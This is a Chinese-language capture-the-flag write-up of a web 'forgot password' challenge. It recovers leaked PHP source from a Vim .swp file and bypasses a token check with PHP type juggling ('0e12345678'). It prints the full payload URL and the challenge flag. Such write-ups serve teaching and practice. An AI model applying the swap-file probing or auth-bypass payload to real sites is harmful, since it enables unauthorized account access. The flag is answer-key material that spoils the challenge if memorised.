忘记密码了
原题链接
http://ctf5.shiyanbar.com/10/upload/step1.php
分析
注册,发现有content,直接填
查看了一下源码,发现好像还有东西:
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
<meta name="renderer" content="webkit" />
<meta name="admin" content="admin@simplexue.com" />
<meta name="editor" content="Vim" />
<br />
注意有个Vim。难道是提示说有vim的源码泄露?试了一下step1.php.swp也不对啊。。。
注册后得到提示
你邮箱收到的重置密码链接为 ./step2.php?email=youmail@mail.com&check=???????
容易得到我们的重置密码链接
http://ctf5.shiyanbar.com/10/upload/step2.php?email=admin@nuptzj.cn&check=???????
问题是check是什么呢?先不管,访问看看,然后一闪而过,回到了原来的注册页面。应该是由于check的问题,但是一闪而过的页面是什么样的呢?
于是抓包看了一下,发现重要信息,有一个新页面submit.php,step2.php,实际上是把数据传给了submit.php
那么Vim的源码泄露,找到罪恶之源了。
http://ctf5.shiyanbar.com/10/upload/.submit.php.swp
........这一行是省略的代码........
/*
如果登录邮箱地址不是管理员则 die()
数据库结构
--
-- 表的结构 `user`
--
CREATE TABLE IF NOT EXISTS `user` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`username` varchar(255) NOT NULL,
`email` varchar(255) NOT NULL,
`token` int(255) NOT NULL DEFAULT '0',
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 AUTO_INCREMENT=2 ;
--
-- 转存表中的数据 `user`
--
INSERT INTO `user` (`id`, `username`, `email`, `token`) VALUES
(1, '****不可见***', '***不可见***', 0);
*/
........这一行是省略的代码........
if(!empty($token)&&!empty($emailAddress)){
if(strlen($token)!=10) die('fail');
if($token!='0') die('fail');
$sql = "SELECT count(*) as num from `user` where token='$token' AND email='$emailAddress'";
$r = mysql_query($sql) or die('db error');
$r = mysql_fetch_assoc($r);
$r = $r['num'];
if($r>0){
echo $flag;
}else{
echo "失败了呀";
}
}
注意到这一句
if(strlen($token)!=10) die('fail');
if($token!='0') die('fail');
token 为10位,且为0,邮箱必须是管理员邮箱,在step1.php里有管理员邮箱admin@simplexue.com
那就简单了
token=0e12345678
这里用的是submit.php
如果还是用step2.php 还是会闪回step1.php,这里有点坑。
还有一个坑点就是,submit.php和step2.php的提交参数不一样,
这一点在抓包的源码中可以看出来。
email:<input name="emailAddress" type="text" <br />
<b>Notice</b>: Use of undefined constant email - assumed 'email' in <b>C:\h43a1W3\phpstudy\WWW\10\upload\step2.php</b> on line <b>49</b><br />
value="admin@simplexue.com" disable="true"/></br>
token:<input name="token" type="text" /></br>
<input type="submit" value="提交">
</form>
</body>
emailAddress&token
于是有了payload
http://ctf5.shiyanbar.com/10/upload/submit.php?emailAddress=admin@simplexue.com&token=0e12345678
flag
SimCTF{huachuan_TdsWX}
知识点
vim写文件造成swp源码泄露
简单审计
查看html源码隐藏信息
一点吐槽,其实题目不难,但是硬是卡了很久,原因就在于,用它填充的密码或者随便注册个密码,它会闪回到step1.php
让我不知所措,还好后来想起来,用Burp抓包看看过程。
网友评论